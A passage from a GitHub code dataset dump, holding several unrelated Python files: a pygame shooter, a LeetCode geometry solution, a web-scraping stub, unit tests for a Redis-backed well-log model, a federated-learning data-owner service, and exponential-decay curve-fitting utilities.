(140, 100))\r\nprojL = pygame.transform.flip(projR, True, False)\r\n\r\ndoomHead = pygame.image.load('808Blaster/Images/doom.png') # 50 X 75\r\n\r\n #Sounds\r\nsanteria = pygame.mixer.Sound('808Blaster/Sounds/Santeria.wav')\r\n\r\n #Fonts\r\nghoust = pygame.font.Font('808Blaster/Font/Ghoust.otf', 32)\r\nzigzag = pygame.font.Font('808Blaster/Font/ZigZag.otf', 64)\r\n\r\n#Initializing user\r\nuser = person(50,height - 140,100,140,santeria)\r\n\r\n\r\n#Drawing screen helper function\r\ndef redrawGameWindow():\r\n WIN.blit(bg, (0,0))\r\n global user, score\r\n\r\n pygame.draw.rect(WIN, (0,0,0), (0,0, 150, 80), 0)\r\n scoreText = ghoust.render('Score: ' + str(score), 1, (255,255,255))\r\n livesText = ghoust.render('Lives: ' + str(lives), 1, (255,255,255))\r\n WIN.blit(scoreText, (5,5))\r\n WIN.blit(livesText, (5,40))\r\n\r\n user.draw(WIN, charR, charL, crouchR, crouchL, walkR, walkL)\r\n #pygame.draw.rect(WIN, (255,0,0), user.hitbox, 1)\r\n for doom in dooms:\r\n doom.draw(WIN, doomHead)\r\n #pygame.draw.rect(WIN, (255,0,0), doom.hitbox, 1)\r\n for shot in shots:\r\n shot.draw(WIN, projR, projL)\r\n #pygame.draw.rect(WIN, (255,0,0), shot.hitbox, 1)\r\n pygame.display.update()\r\n\r\ndef drawGameOverWindow():\r\n WIN.fill((0,0,0))\r\n gameOverText = zigzag.render(\"GAME OVER!\", 1, (255,255,255))\r\n scoreText = ghoust.render(\"You scored \" + str(score), 1, (255,255,255))\r\n WIN.blit(gameOverText, (230,200))\r\n WIN.blit(scoreText, (310,300))\r\n pygame.display.update()\r\n\r\n\r\n#Handling keys helper function\r\ndef handleKeyPress(keys):\r\n \r\n #walking\r\n if keys[pygame.K_a]:\r\n user.left = True\r\n user.right = False\r\n user.standing = False \r\n user.walkCount -= 1\r\n pos = user.x - user.vel\r\n user.x = pos if pos > 0 else 0\r\n user.updateHitbox()\r\n elif keys[pygame.K_d]:\r\n user.right = True\r\n user.left = False\r\n user.standing = False\r\n user.walkCount += 1\r\n pos = user.x + user.vel\r\n user.x = pos if pos < (width - user.w) else (width - user.w)\r\n user.updateHitbox()\r\n else:\r\n user.walkCount = 0\r\n user.standing = True\r\n \r\n #crouching\r\n if keys[pygame.K_s]:\r\n if not user.isCrouched:\r\n user.isCrouched = True\r\n user.y += 65\r\n user.updateHitbox()\r\n else:\r\n if user.isCrouched:\r\n user.isCrouched = False\r\n user.y -= 65\r\n user.updateHitbox()\r\n\r\n #shooting\r\n if not user.isShoot:\r\n if keys[pygame.K_w] and user.hasEquipped:\r\n face = 1 if user.right else -1\r\n x = round(user.x + user.w // 2)\r\n x = x if face == 1 else x - 140\r\n y = user.y + 20\r\n user.equipped.play()\r\n shots.append(projectile(x, y, face)) \r\n user.isShoot = True\r\n else:\r\n user.shootCount += 1\r\n if user.shootCount > 10:\r\n user.shootCount = 0\r\n user.isShoot = False\r\n\r\n #jumping\r\n if not user.isJump:\r\n if keys[pygame.K_SPACE]:\r\n user.isJump = True\r\n else:\r\n if user.jumpCount >= -user.jL:\r\n userH = 75 if user.isCrouched else 140\r\n temp = user.y\r\n temp -= ((user.jumpCount ** 2) / 2) if (user.jumpCount > 1) else -((user.jumpCount ** 2) / 2)\r\n user.y = temp if temp < (height - userH) else (height - userH)\r\n user.jumpCount -= 1\r\n user.updateHitbox()\r\n else:\r\n user.isJump = False\r\n user.jumpCount = user.jL\r\n\r\n\r\nshots = []\r\ndooms = []\r\ndoomCount = 0\r\nhitTimer = 0\r\ngameOver = False\r\n#Main Loop\r\nrun = True\r\nwhile run:\r\n clock.tick(fps)\r\n # Exits game when user does\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n if not gameOver:\r\n doomCount += 1\r\n if doomCount % difficulty == 0:\r\n dooms.append(enemy())\r\n\r\n if user.isHit:\r\n hitTimer += 1\r\n if hitTimer >= 30:\r\n hitTimer = 0\r\n user.isHit = False\r\n\r\n for shot in shots:\r\n if shot.x < (width - shot.w) and shot.x > 0:\r\n shot.x += shot.vel\r\n shot.updateHitbox()\r\n else:\r\n shots.pop(shots.index(shot))\r\n for doom in dooms:\r\n \r\n if (user.hitbox[0] < doom.hitbox[0] + doom.hitbox[2] and\r\n user.hitbox[0] + user.hitbox[2] > doom.hitbox[0] and\r\n user.hitbox[1] < doom.hitbox[1] + doom.hitbox[3] and\r\n user.hitbox[1] + user.hitbox[3] > doom.hitbox[1]\r\n and not user.isHit\r\n and doom.hitbox[1] < 500):\r\n print(user.hitbox)\r\n print(doom.hitbox)\r\n lives -= 1\r\n if lives <= 0:\r\n gameOver = True\r\n user.hit()\r\n dooms.pop(dooms.index(doom))\r\n continue\r\n \r\n for shot in shots:\r\n if (shot.hitbox[0] < doom.hitbox[0] + doom.hitbox[2] and\r\n shot.hitbox[0] + shot.hitbox[2] > doom.hitbox[0] and\r\n shot.hitbox[1] < doom.hitbox[1] + doom.hitbox[3] and\r\n shot.hitbox[1] + shot.hitbox[3] > doom.hitbox[1] and\r\n not doom.isHit):\r\n score += 1\r\n doom.hit()\r\n shots.pop(shots.index(shot))\r\n\r\n if doom.isHit and (doom.y < 500):\r\n doom.y -= doom.vel\r\n doom.updateHitbox()\r\n elif (doom.x > 0):\r\n doom.x += doom.vel\r\n doom.updateHitbox()\r\n else:\r\n dooms.pop(dooms.index(doom))\r\n \r\n keys = pygame.key.get_pressed()\r\n handleKeyPress(keys)\r\n redrawGameWindow()\r\n \r\n else:\r\n \r\n drawGameOverWindow()\r\n\r\n\r\npygame.quit()\r\n","repo_name":"zdzirin/808Blaster","sub_path":"808Blaster.py","file_name":"808Blaster.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38726671961","text":"'''\r\n###### * User Profile : Keval_78 \r\nLinkedIn: https://www.linkedin.com/in/kevalpadsala78/\r\nGithub: https://github.com/Keval78\r\nLeetcode: https://leetcode.com/Keval_78/\r\n'''\r\n\r\nfrom typing import List\r\n\r\n\r\ndef main():\r\n class Solution:\r\n def isBoomerang(self, points: List[List[int]]) -> bool:\r\n x1, y1, x2, y2, x3, y3 = points[0] + points[1] + points[2]\r\n area = abs(x1*(y2-y3) + x2*(y3-y1) + x3*(y1-y2))/2\r\n return area != 0\r\n\r\n Solution().isBoomerang(points=[[1, 1], [2, 3], [3, 2]])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Keval78/Programming_Solutions","sub_path":"LeetCode/Daily/1037 Valid Boomerang.py","file_name":"1037 Valid Boomerang.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27686718214","text":"from bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\n\ndef nemligList():\n\n URL = 'https://www.nemlig.com/?search=pepsi'\n\n\n \n session = HTMLSession()\n r = session.get(URL)\n\n r.html.render(sleep=1, keep_page=True)\n\n soup = BeautifulSoup(r.html.html,'lxml')\n\n\n\n print(soup.find_all('productlist-item__name'))\n\nnemligList()","repo_name":"Stobes/python_4sem","sub_path":"Python_exam/Modules/nemlig_scraping.py","file_name":"nemlig_scraping.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71559895789","text":"import os\nimport string\nimport unittest\nfrom datetime import datetime, timedelta\nfrom random import randint, random, choice\n\nimport numpy as np\n\nfrom components.database.RedisStorage import RedisStorage\nfrom components.domain.Log import BasicLog\nfrom components.domain.Well import Well\nfrom components.domain.WellDataset import WellDataset\nfrom components.importexport import las\nfrom components.importexport.markers_importexport import import_markers_csv\nfrom settings import BASE_DIR\n\n\nclass TestLog(unittest.TestCase):\n def setUp(self) -> None:\n _s = RedisStorage()\n _s.flush_db()\n self.well = Well(\"test\", new=True)\n self.dataset = WellDataset(self.well, \"test\", new=True)\n self.path_to_test_data = os.path.join(BASE_DIR, 'components', 'domain', 'tests', 'test_data')\n\n def test_create_two_logs(self):\n\n data = {\"GR\": np.array(((10.0, 1.0), (20.0, 2.0))),\n \"PS\": np.array(((10.0, 3.0), (20.0, 4.0)))}\n meta = {\"GR\": {\"units\": \"gAPI\", \"code\": \"\", \"description\": \"GR\"},\n \"PS\": {\"units\": \"mV\", \"code\": \"\", \"description\": \"PS\"}}\n log1 = BasicLog(self.dataset.id, log_id=\"GR\")\n log1.values = data[\"GR\"]\n log1.meta = meta[\"GR\"]\n log1.save()\n\n log2 = BasicLog(self.dataset.id, log_id=\"PS\")\n log2.values = data[\"PS\"]\n log2.meta = meta[\"PS\"]\n log2.save()\n\n for log_name in data.keys():\n log = BasicLog(self.dataset.id, log_name)\n self.assertTrue(np.isclose(log.values, data[log_name], equal_nan=True).all())\n\n def test_log_meta_parsed_to_properties(self):\n meta = {\"GR\": {\"units\": \"gAPI\", \"code\": \"\", \"description\": \"GR\"}, }\n\n log1 = BasicLog(self.dataset.id, log_id=\"GR\")\n log1.meta = meta[\"GR\"]\n log1.meta.one_more_field = \"test_value\"\n log1.save()\n\n self.assertEqual('GR', log1.meta.name)\n self.assertEqual([], log1.meta.tags)\n self.assertEqual('test_value', log1.meta.one_more_field)\n\n def test_name_works_correctly(self):\n log_id = 'GRTRTT'\n gr = BasicLog(log_id=log_id)\n self.assertEqual(log_id, gr.name)\n gr.meta.name = 'GR'\n self.assertEqual('GR', gr.name)\n self.assertFalse(gr.exists())\n gr.meta.dataset_id = self.dataset.id\n gr.save()\n self.assertTrue(gr.exists())\n\n gr1 = BasicLog(dataset_id=self.dataset.id, log_id=log_id)\n self.assertTrue(gr1.exists())\n self.assertEqual(\"GR\", gr1.name)\n\n def test_log_get_data(self):\n f = 'small_file.las'\n ref_depth = 200.14440000\n wellname = '15_9-13'\n dataset_name = 'one'\n well = Well(wellname, new=True)\n dataset = WellDataset(well, dataset_name, new=True)\n\n dataset.meta = las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n true_answer = {'DRHO': np.nan,\n 'NPHI': np.nan,\n 'BS': 17.5,\n 'DTS': np.nan,\n 'x_loc': 444904.03125}\n\n for log_name in true_answer.keys():\n log = BasicLog(dataset.id, log_name)\n log.crop(depth=ref_depth, inplace=True)\n value = log[0, 1] # [row, column]\n self.assertTrue(np.isclose(value, true_answer[log_name], equal_nan=True))\n\n def test_add_many_logs(self):\n f = 'small_file.las'\n log_count = 5\n LOG_TYPES = (float, str, int, bool, datetime,)\n\n wellname = 'thousand_logs'\n datasetname = 'this_dataset'\n well = Well(wellname, new=True)\n dataset = WellDataset(well, datasetname, new=True)\n\n # load some real data\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n # create logs in the dataset\n new_logs = {f\"LOG_{i}\": log_type for i, log_type in enumerate(LOG_TYPES)}\n new_logs_meta = {f\"LOG_{i}\": {\"units\": \"some_units\", \"code\": i, \"description\": f\"Dummy log {i}\"} for i in range(0, log_count)}\n # get depths\n existing_depths = BasicLog(dataset.id, \"GR\").values[:, 0]\n\n # add data to the log_names\n def dummy_data(dtype): # returns scalar\n generators = {\n float: 400 * random() - 200,\n str: ''.join(choice(string.ascii_letters) for _ in range(64)),\n int: randint(-1000, 1000),\n datetime: datetime.strftime(datetime.now() + random() * timedelta(days=1), \"%Y-%m-%d %H:%M:%S.%f%z\"),\n bool: 1 == randint(0, 1)\n }\n return generators[dtype]\n\n def dummy_log(depths, dtype):\n return np.array([(depth, dummy_data(dtype)) for depth in depths])\n\n for new_log, log_type in new_logs.items():\n log = BasicLog(dataset_id=dataset.id, log_id=new_log)\n log.values = dummy_log(existing_depths, log_type)\n log.meta = new_logs_meta[new_log]\n log.save()\n\n self.assertEqual(len(dataset.log_list), 21 + log_count)\n d = BasicLog(dataset.id, 'LOG_1')\n self.assertEqual(84, len(d), 'Log length must be 84')\n\n def test_logs_list(self):\n f = 'small_file.las'\n wellname = f[:-4]\n well = Well(wellname, new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n log_list = dataset.get_log_list()\n self.assertIn(\"GR\", log_list)\n\n def test_log_history(self):\n f = 'small_file.las'\n wellname = \"log_history_test\"\n well = Well(wellname, new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n log = BasicLog(dataset.id, \"GR\")\n log.meta.append_history(f'Loaded from {f}')\n self.assertEqual(f'Loaded from {f}', log.meta.history[0][1])\n\n def test_append_log_meta(self):\n well = Well('well2', new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n meta = {\"GR\": {\"units\": \"gAPI\", \"code\": \"\", \"description\": \"GR\"},\n \"PS\": {\"units\": \"mV\", \"code\": \"\", \"description\": \"PS\"}}\n\n for log_name, new_meta in meta.items():\n log = BasicLog(dataset.id, log_name)\n log.meta = new_meta\n log.save()\n\n log = BasicLog(dataset.id, \"GR\")\n log.meta.max_depth = 100\n log.save()\n\n self.assertEqual(log.meta.max_depth, 100)\n\n def test_unit_conversion_works_correctly(self):\n well = Well('unit_conversion')\n dataset = WellDataset(well, \"test\")\n welllog = BasicLog(dataset.id, \"log\")\n welllog.name = \"log\"\n welllog.meta.units = \"cm\"\n welllog.values = np.array([(10.0, 10), (20.0, 20)])\n\n vals_in_m = welllog.convert_units('km')\n self.assertListEqual([10 ** -4, 2 * 10 ** -4], list(vals_in_m[:, 1]))\n\n welllog.meta.units = \"kg\"\n vals_in_m = welllog.convert_units('g')\n self.assertListEqual([10000, 20000], list(vals_in_m[:, 1]))\n\n def test_adding_removing_tags(self):\n well = Well('tags', new=True)\n dataset = WellDataset(well, \"test\", new=True)\n welllog = BasicLog(dataset.id, \"log\")\n # welllog.save()\n # no tags in the log - empty list\n self.assertEqual(list(), welllog.meta.tags)\n self.assertEqual(list, type(welllog.meta.tags))\n # add one tag - and check it is there\n welllog.meta.add_tags(\"tag1\", )\n welllog.save()\n self.assertCountEqual({\"tag1\"}, welllog.meta.tags)\n self.assertEqual(list, type(welllog.meta.tags))\n # do not add duplicated tag\n welllog.meta.add_tags(\"tag1\")\n self.assertCountEqual([\"tag1\"], welllog.meta.tags)\n # add multiple new logs\n welllog.meta.add_tags(\"tag1\", \"tag2\", \"tag3\")\n self.assertCountEqual([\"tag1\", \"tag2\", \"tag3\"], welllog.meta.tags)\n # delete one tag\n welllog.meta.delete_tags(\"tag1\")\n welllog.save()\n self.assertCountEqual([\"tag2\", \"tag3\"], welllog.meta.tags)\n # check cannot delete missing tag\n with self.assertRaises(ValueError):\n welllog.meta.delete_tags(\"tag1\")\n # check delete multiple tags\n welllog.meta.delete_tags(\"tag2\", \"tag3\")\n welllog.save()\n self.assertEqual([], welllog.meta.tags)\n dataset.delete_log(welllog.name)\n\n def test_hashing_works_correctly(self):\n f = 'small_file.las'\n wellname = f[:-4]\n well = Well(wellname, new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n log = BasicLog(dataset.id, \"GR\")\n log.update_hashes()\n log.save()\n\n true_values = {\n \"data_hash\": \"43b6e247100f1688023b4e915ad852d0\",\n \"meta_hash\": \"75e2790b7bd95272c1b34efb0270ba0a\",\n \"full_hash\": \"43b6e247100f1688023b4e915ad852d075e2790b7bd95272c1b34efb0270ba0a\"\n }\n test_log = BasicLog(dataset.id, \"GR\")\n self.assertEqual(true_values['data_hash'], test_log.data_hash)\n self.assertEqual(true_values['meta_hash'], test_log.meta_hash)\n self.assertEqual(true_values['full_hash'], test_log.full_hash)\n\n\nclass TestMarkersLog(unittest.TestCase):\n def setUp(self) -> None:\n pass\n # _s = RedisStorage()\n # _s.flush_db()\n self.path_to_test_data = os.path.join(BASE_DIR, 'test_data')\n # for filename in os.listdir(os.path.join(self.path_to_test_data, 'ProjectData')):\n # if not filename.endswith('.las'):\n # continue\n # import_to_db(filename=os.path.join(self.path_to_test_data, 'ProjectData', filename))\n\n def test_markers_with_gaps_loading_from_csv(self):\n with open(os.path.join(self.path_to_test_data, 'Markers', 'FieldData_StratigraphyWithoutGaps.csv')) as raw_data:\n import_markers_csv(raw_data=raw_data, missing_value='-9999')\n","repo_name":"iGeophysix/gamma","sub_path":"components/domain/tests/test_log.py","file_name":"test_log.py","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37509137553","text":"import logging\n\nfrom commons.data.data_loader import DataLoader\nfrom commons.decorators.decorators import data_owner_computation\nfrom commons.model.model_service import ModelFactory\nfrom commons.utils.singleton import Singleton\nfrom commons.operations_utils.functions import deserialize, serialize\nfrom data_owner.domain.data_owner import DataOwner\nfrom data_owner.models.model import Model, TrainingStatus\nfrom data_owner.services.datasets_service import DatasetsService\nfrom data_owner.services.federated_aggregator_connector import FederatedAggregatorConnector\n\n\nclass DataOwnerService(metaclass=Singleton):\n\n def __init__(self):\n self.client_id = None\n self.trainings = {}\n self.config = None\n self.data_loader = None\n self.federated_aggregator_connector = None\n self.encryption_service = None\n\n def init(self, config, encryption_service=None):\n \"\"\"\n :param config:\n :param data_loader:\n :param encryption_service:\n \"\"\"\n self.config = config\n self.encryption_service = encryption_service\n self.federated_aggregator_connector = FederatedAggregatorConnector(self.config)\n\n def update_stored_model(self, model_orm, model, public_key):\n model_orm.set_weights(serialize(model.weights, self.encryption_service, public_key))\n model_orm.model = model\n model_orm.update()\n\n def get_stored_model(self, model_orm, public_key):\n model_orm.set_weights(deserialize(model_orm.get_weights(), self.encryption_service, public_key))\n\n @data_owner_computation()\n def process(self, model_id, weights, public_key):\n \"\"\"\n Process to run model\n :param model_type:\n :param weights:\n :return:\n \"\"\"\n\n logging.info(\"Initializing local model\")\n model_orm = Model.get(model_id)\n model_orm.set_weights(weights)\n model, gradient = DataOwner().calculate_gradient(model_orm.model)\n self.update_stored_model(model_orm, model, public_key)\n return gradient\n\n def register(self, user):\n \"\"\"\n Register client into federated server\n :return:\n \"\"\"\n self.client_id = user.delta_id\n result = self.federated_aggregator_connector.register(user)\n\n logging.info(\"DataOwner registration status:\" + str(result))\n\n def get_id(self):\n return self.client_id\n\n @data_owner_computation()\n def step(self, model_id, step_data, public_key):\n \"\"\"\n :param model_id:\n :param step_data:\n :param public_key:\n :return:\n \"\"\"\n model_orm = Model.get(model_id)\n self.get_stored_model(model_orm, public_key)\n model = DataOwner().step(model_orm.model, step_data, float(self.config['ETA']))\n return model.weights\n\n @data_owner_computation()\n def model_quality_metrics(self, model_id, weights, model_type, public_key):\n \"\"\"\n Method used only by validator role. It doesn't use the model built from the data. It gets the model from\n the federated trainer and use the local data to calculate quality metrics\n :return: the model quality (currently measured with the MSE)\n \"\"\"\n data_owner = DataOwner()\n logging.info(\"Getting metrics, data owner: {}\".format(self.client_id))\n model_orm = Model.get(model_id)\n X_test, y_test = model_orm.get_dataset()\n model_orm.set_weights(weights)\n diffs = data_owner.model_quality_metrics(model_orm.model, X_test, y_test)\n return diffs\n\n def update_mse(self, model_id, mse, role):\n \"\"\"\n Method used only by validator role. It doesn't use the model built from the data. It gets the model from\n the federated trainer and use the local data to calculate quality metrics\n :return: the model quality (currently measured with the MSE)\n \"\"\"\n logging.info(\"Getting metrics, data owner: {}\".format(self.client_id))\n model_orm = Model.get(model_id)\n model_orm.add_mse(mse)\n if model_orm.initial_mse == 0.0:\n model_orm.initial_mse = mse\n model_orm.status = TrainingStatus.IN_PROGRESS.name\n model_orm.improvement = max([(model_orm.initial_mse - mse) / model_orm.initial_mse, 0])\n model_orm.iterations += 1\n model_orm.role = role\n model_orm.update()\n logging.info(\"Calculated mse: {}\".format(mse))\n\n def link_model_to_dataset(self, model_id):\n has_dataset = False\n model = Model.get(model_id)\n dataset = DatasetsService().get_dataset_for_training(model.requirements)\n if not dataset:\n return model_id, self.get_id(), has_dataset\n model.link_to_dataset(dataset)\n model.update()\n self.federated_aggregator_connector.accept_model_training(self.get_id(), model_id)\n return model_id, self.get_id(), not has_dataset\n\n def model_is_linked(self, model_id):\n return Model.get(model_id).status != TrainingStatus.WAITING.name\n\n def init_model(self, model_id, model_type, reqs):\n model = Model(model_id, model_type, reqs)\n model.save()\n return model_id, self.get_id()\n\n def finish_training(self, model_id, contribs, improvement):\n model = Model.get(model_id)\n model.status = TrainingStatus.FINISHED.name\n model.improvement = improvement\n model.earned = self._calculate_earnings(model, contribs)\n model.update()\n\n def _calculate_earnings(self, model, contribs):\n proportion_for_trainers = 0.7\n proportion_for_validators = 0.2\n intial_payment_for_linear_regression = 5 # TODO: This has to be refactored later\n if self.get_id() in contribs:\n trainers_pay = intial_payment_for_linear_regression * model.improvement * proportion_for_trainers\n return round(trainers_pay * contribs[self.get_id()], 3)\n else:\n return round(intial_payment_for_linear_regression * proportion_for_validators, 3)\n","repo_name":"DeltaML/data-owner","sub_path":"data_owner/services/data_owner_service.py","file_name":"data_owner_service.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12419927186","text":"import numpy as np\r\nfrom scipy.optimize import curve_fit\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n\r\ndef mean_square_error_fo(bin_values, lambda_: float, beta_: float) -> float:\r\n \"\"\"Computes the mean square error of a first order\r\n linear model with parameters beta_ and lambda_, with\r\n data discretized in steps of 1 unit of time.\r\n \r\n Args:\r\n - bin_values: bin values of the engagement histogram\r\n - beta_: parameter modelling the initial response to\r\n the tweet. Should be positive\r\n - lambda_: decay constant which should take values\r\n less than 1\r\n \r\n Returns:\r\n - MSE: the mean square error\r\n \"\"\"\r\n x_hat = beta_\r\n MSE = 0\r\n for x in bin_values:\r\n MSE += (x-x_hat)**2\r\n x_hat *= (1-lambda_)\r\n MSE = MSE / len(bin_values)\r\n return MSE\r\n\r\n\r\ndef eval_error(time, model_engagement, true_engagement) -> tuple[float, float, float]:\r\n \"\"\"Computes the mean square error, and the ratio between the sum of\r\n squared residuals and the sum of the squared signal in continuous time\r\n \r\n Args:\r\n - time: time vector for the observations\r\n - model_engagement: predicted engagement of fitted model\r\n - true_engagement: engagement at times specified in time vector\r\n \r\n Returns:\r\n - MSE: mean square error\r\n - RSS_frac: ratio of residuals squared and sum_signal_squared\r\n - sum_signal_squared: sum of squared signal samples\r\n \"\"\"\r\n res = model_engagement - true_engagement\r\n sq_residual = np.square(res)\r\n sq_signal = np.square(true_engagement)\r\n \r\n MSE = np.mean(sq_residual)\r\n sum_signal_squared = np.sum(sq_signal)\r\n RSS_frac = np.sum(sq_residual)/sum_signal_squared\r\n \r\n #plt.hist(res, bins=200)\r\n #plt.show()\r\n \r\n return MSE, RSS_frac, sum_signal_squared\r\n\r\n\r\ndef lognormal_MLE(x):\r\n mu = np.mean(np.log(x))\r\n sigma = np.mean((np.log(x)-mu)**2)\r\n return mu, sigma\r\n\r\ndef exponential(x_, lambda_, beta_):\r\n \"\"\"Exponential decay with parameters lambda and beta.\"\"\"\r\n return beta_*np.exp(-lambda_*x_)\r\n\r\n\r\ndef log_exponential(x_, lambda_, beta_):\r\n return np.log(exponential(x_, lambda_, beta_))\r\n\r\n\r\ndef log_exp(x_, lambda_, log_beta_):\r\n \"\"\"Logarithm of exponential decay with parameters lambda and beta.\"\"\"\r\n return log_beta_ - lambda_*x_\r\n\r\n\r\ndef power(x_, lambda_, beta_):\r\n \"\"\"Power law.\"\"\"\r\n return beta_*(np.power(np.array(x_, dtype=float), -lambda_))\r\n\r\n\r\ndef estimate_lin_decay(time, engagement):\r\n t, log_eng = [], []\r\n for i, e in enumerate(engagement):\r\n if e != 0:\r\n log_eng.append(np.log(e))\r\n t.append(time[i])\r\n \r\n time = np.array(t)\r\n log_eng = np.array(log_eng)\r\n \r\n lin_model = LinearRegression(fit_intercept=True)\r\n \r\n #log_eng = np.log(np.array(engagement)+1)\r\n lin_model.fit(time.reshape(-1, 1), log_eng.reshape(-1, 1))\r\n \r\n lambda_ = -lin_model.coef_[0][0]\r\n beta_ = np.exp(lin_model.intercept_[0])\r\n \r\n #print(\"coefs:\", lambda_, beta_)\r\n \r\n return lambda_, beta_\r\n \r\n\r\ndef estimate_decay_parameters(time, engagement, loss_='linear', f_scale_=1.0):\r\n \"\"\"Returns an estimate of the parameters of the\r\n exponential decay function of engagement over time.\r\n \r\n Args:\r\n - time: time vector\r\n - engagement: engagement at times specified\r\n in time vector\r\n \r\n Returns:\r\n - popt: optimal parameters\r\n \"\"\"\r\n # lower and upper bounds on lambda and beta:\r\n # 1e-4 <= lambda <= 1e3, and 1 <= beta <= 1e9.\r\n bounds_ = ([1e-4, 1], [1e3, 1e9])\r\n init = [1, 1]\r\n \r\n # Optimization: Trust Region Reflective algorithm 'trf'\r\n # Levenberg-Marquardt ('lm') does not handle parameter bounds\r\n method_ = 'trf'\r\n \r\n # Linear fit (alt. L1 fit)\r\n popt, _ = curve_fit(exponential, time, engagement, p0=init,\r\n bounds=bounds_, method=method_, loss=loss_, f_scale=f_scale_)\r\n \r\n # Log fit\r\n #engagement = np.array(engagement)\r\n #log_eng = np.log(engagement+1e-3)\r\n #bounds_ = ([1e-4, 0], [1e3, 9]) # 0 <= log(beta) <= 9\r\n #popt, _ = curve_fit(log_exponential, time, engagement, p0=init,\r\n # bounds=bounds_, method=method_)\r\n \r\n return popt\r\n\r\n\r\ndef delayed_biexponential(x_, alpha, beta, gamma, eta, sigma, delay):\r\n \"\"\"Solution to second order system. Assumes that the time bins\r\n are spaced 1 hour apart (tau_d is the delay given in hours).\r\n \r\n Note that gamma and alpha are positive, whereas they are negative\r\n in the original equation system.\r\n \"\"\"\r\n #tau_dn = int(tau_d*100)\r\n #u_delay = np.concatenate((np.zeros(tau_dn), np.ones(len(x_)-tau_dn)))\r\n #return eta*np.exp(-alpha*x_) + (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-tau_d))*u_delay - (beta/(gamma-alpha))*np.exp(-gamma*(x_-tau_d))*u_delay \r\n delay=int(delay)\r\n delayed = (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-delay)) - (beta/(gamma-alpha))*np.exp(-gamma*(x_-delay))\r\n delayed[:delay] = 0\r\n return eta*np.exp(-alpha*x_) + delayed\r\n\r\n\r\ndef biexponential(x_, alpha, beta, gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n\r\n\r\ndef u_biexponential(x_, alpha, beta, gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n if np.abs(gamma - alpha) < 1e-10:\r\n return np.exp(-alpha*(x_))*rho\r\n else:\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n\r\n\r\ndef estimate_unconstr_biexp(time, engagement):\r\n \r\n def biexponential_unconstr_opt(x_, alpha, beta, gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n if np.abs(gamma - alpha) < 1e-10:\r\n return np.exp(-alpha*(x_))*rho\r\n else:\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n \r\n method_ = 'lm'\r\n init = [1, 1, 1, 1]\r\n popt, _ = curve_fit(biexponential_unconstr_opt, time, engagement, p0=init, method=method_)\r\n a, b, g, r = popt[0], popt[1], popt[2], popt[3]\r\n return a, b, g, r\r\n\r\n\r\ndef estimate_biexponential(time, engagement, loss_='linear'):\r\n \r\n def biexponential_opt(x_, alpha, beta, d_gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n gamma = alpha + d_gamma\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n \r\n method_ = 'trf'\r\n # alpha, beta, d_gamma, rho\r\n bounds_ = ([1e-5, 1e-2, 1e-5, 1e-3],\r\n [1e3, 1e9, 1e3, 1e9])\r\n init = [1e-1, 1, 1e-1, 1]\r\n \r\n \"\"\"Alt. bounds:\r\n bounds_ = ([0, 0, 1e-9, 1e-9],\r\n [1e9, 1e9, 1e9, 1e9])\r\n init = [1e-1, 1, 1e-1, 1]\r\n \"\"\"\r\n \r\n popt, _ = curve_fit(biexponential_opt, time, engagement,\r\n p0=init, bounds=bounds_, method=method_, loss=loss_)\r\n a, b, d_g, r = popt[0], popt[1], popt[2], popt[3]\r\n g = a + d_g\r\n return a, b, g, r\r\n\r\n\r\ndef estimate_second_order(time, engagement, delay, loss_='linear'):\r\n \"\"\"Fit a second order model of type\r\n dx1/dt = ax1 + bx2 + nd(t) + sd(t-td)\r\n dx2/dt = gx2 + + 